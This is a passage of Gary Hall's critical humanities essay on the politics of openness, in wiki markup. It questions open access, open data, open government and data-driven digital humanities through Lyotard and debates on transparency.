&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a&amp;amp;nbsp; point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies such as the NSA in the US and GCHQ in the UK with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the 